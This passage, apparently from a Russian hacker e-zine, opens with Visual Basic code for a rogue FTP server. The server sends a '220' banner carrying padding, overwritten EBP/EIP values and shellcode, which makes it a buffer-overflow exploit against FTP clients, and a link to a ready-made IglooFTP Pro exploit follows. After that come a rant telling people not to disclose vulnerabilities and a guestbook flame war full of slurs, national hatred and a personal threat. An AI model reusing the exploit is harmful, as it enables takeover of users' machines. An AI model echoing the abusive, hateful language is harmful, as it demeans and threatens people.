Text3.Text)) & Chr(Val("&H" & Text2.Text)) exploit = pad & ebp & eip & shellcode Winsock1.SendData "220 " & exploit & vbCrLf Exit Sub errhlp: If Err.Number = 40006 Then MsgBox "No connection made when data was sent.", , "Error" End If Winsock1.Close Winsock1.LocalPort = 21 Winsock1.Listen Text1.Text = "" End Sub Private Sub Form_Load() Winsock1.LocalPort = 21 Winsock1.Listen End Sub Private Sub Winsock1_Close() Text1.Text = "Closed!" End Sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long) If Winsock1.State <> sckClosed Then Winsock1.Close Winsock1.Accept requestID Text1.Text = "Connected!" End Sub Если вы нифига здесь не поняли, или у вас просто нет желания ничего делать самому, то вы можете скачать уже готовый эксплоит из инета, как это сделал сейчас я: http://www.packetstormsecurity.nl/0307-exploits/iglooftppro.zip ####################################################################################################### ### O U T R O ### ####################################### "Defaced подходит к концу, и скоро финиш. Я воткнул так, что хуй вынешь!" (c) Сергей Шнуров В этом номере мы рассказали вам всю правду об опальной редакции defaced. Мы предоставили вам неопровержимые доказательства грязных связей d3f4c3d5t4ff с security-сообществом, а также напомнили вам об их scriptkiddie прошлом и настоящем(будущего у этих людей больше нет). После такого позора евронимоусу остается только вскрыть себе вены или утопиться в унитазе. Теперь обращение ко всем кто уже постит адвизори в багтреш или еще только собирается туда что-нибудь запостить. Думаете благодаря кому секьюритифокус до сих пор не загнулся? Благодаря таким ламерам как nimber и euronymous, которые регулярно снабжают его свежими XSS уязвимостями. Все кто публично рассказывает об уязвимостях могут сосать половой член. Если ты нашел уязвимость, засунь е╦ себе в жопу и забудь про багтрек. Помоги секфокусу тихо умереть! - New defaced staff, 30е Марта 2004 56. Имя: hofman , E-Mail: hofman@network.com, Город: huh? , Home Page URL: none Комментарии: I see that al russian hackers are in script kiddie mode. sad but true. all ur so called cool hacks are no more than bullshit. ho and play with some trojans babyies. - Monday, February 25, 2002 at 13:36:27 (MSK) 55. Имя: aLph4Num3Ric , E-Mail: alph4num3ric@crackdealer.com, Комментарии: to hofamn: dude just fuck off we didn't give a fuck what you think about us... - Monday, February 25, 2002 at 18:13:31 (MSK) 54. Имя: hofman , E-Mail: billy@microsoft.com, Город: fuck , Home Page URL: http://shit Комментарии: As i said ur buch of sucking script kiddies in 3 world country - Wednesday, February 27, 2002 at 14:03:30 (MSK) 53. Имя: aLph4Num3Ric , E-Mail: alph4num3ric@crackdealer.com, Комментарии: to sucker hosfman - listen bitch, shut your fucking mouth, u fucking AMERICAN bitch im gana fuck you up next time you come here ASSHOLE YOU FUCKING moron russia aint' 3 world country u stupid bitch...fucker - Wednesday, February 27, 2002 at 20:14:30 (MSK) 52. Имя: voodoo , Комментарии: Don`t be angry alph4 - he`s just another stupid american sucker. Yes, yes, exactly ANOTHER, cuz they are all stupid in this fuckin country. The Americans - most stupid people in the world. They like to think thet they are first, but... they are nothing. Russia has beter weapons, better scinse and better peoples, whio CAN THINK not only about money. America - is dead conuntry where living not humans, just BIOMASS. Thet`s all i can say. And u hofman just stupid sucker, whom can`t do anything like we, u r just envy... Like all americans biomass. Fuck u all. Someday i will gladly watch, like all you fuckin` nation will die... - Wednesday, February 27, 2002 at 20:35:35 (MSK) 51. Имя: hofman , E-Mail: fuck@u.to, Город: aa , Home Page URL: http://miscrosoft.com Комментарии: Heh suckaz, im not from USA. And russia is 666 world country. All u comunist asses, ur rotting there in ur own shitpile cause, all u can think off is vodka drinking. Stupid bunch of cript kiddies are all so called leet hackers of russia - the federation of morons. Fuck ur all russian suckers. - Saturday, March 02, 2002 at 16:15:28 (MSK) 50. Имя: voodoo , Комментарии: Af first.This is another example of stupidity of west civilization. Hey buster, shut ur fucking mouth! U don`t know anything about russia, about it history, about many things! When u visit our country, only then u could say anything about it. At second - we are not script kiddies. U don`t know anything about our group. So please, if u want to say bullshit about somebody go to ur website (microsoft.com) :). - Sunday, March 03, 2002 at 11:54:36 (MSK) 49. Имя: Crazy Einstein , Комментарии: to hofman: hmm...i can't understand only one thing.. if you don't like us...why are you here? -:) i think you are little boy who loves make shit and no more...so..fuck off you little creep. to voodoo & alfa: hi -:). slushaite hvatit na nego vnimanie obrashat'... 4to vi kak deti.. on sam potom otvalit..esli vi na ego frazi otve4at' ne budete... naher portit' nervi ot malenkogo zasranca..-:) - Sunday, March 03, 2002 at 12:20:15 (MSK) 48. Имя: hoffman , E-Mail: sdf@cff.com, Город: aaa , Home Page URL: http://www.russiasuck.com Комментарии: davai davai russkije zasranci. all i can say bout ur country and i have been in your 3 world country is that all poeple there are completely stupid. - Monday, March 04, 2002 at 14:20:10 (MSK) 47. Имя: hoffman , E-Mail: aa, Город: aa , Home Page URL: http://z Комментарии: why im here? cause i lough here bout ur stupidnes, and silliness. u cant do anything. ur so called defaces are only designed pages by ur own team. no defaces was made by u really. comon if ur so leet hackers then try to hack my site @ http://www.theprynce.com/ then we will see if u can do anything or just suck ur own disk, masturbate near mirror, and cry out loud that russia is cool country and ur leet d00dz - Monday, March 04, 2002 at 14:33:45 (MSK) 45. Имя: voodoo , Комментарии: hey,hofman, if u don`t belive, that we had hacked this fuckin sites, just come to www.void.ru and look into deface archives. - Monday, March 04, 2002 at 21:32:38 (MSK) 41. Имя: hoffman , E-Mail: a, Город: a , Home Page URL: http://aa Комментарии: void.ru another scriptkid site? get a life or something. - Thursday, March 07, 2002 at 11:33:48 (MSK)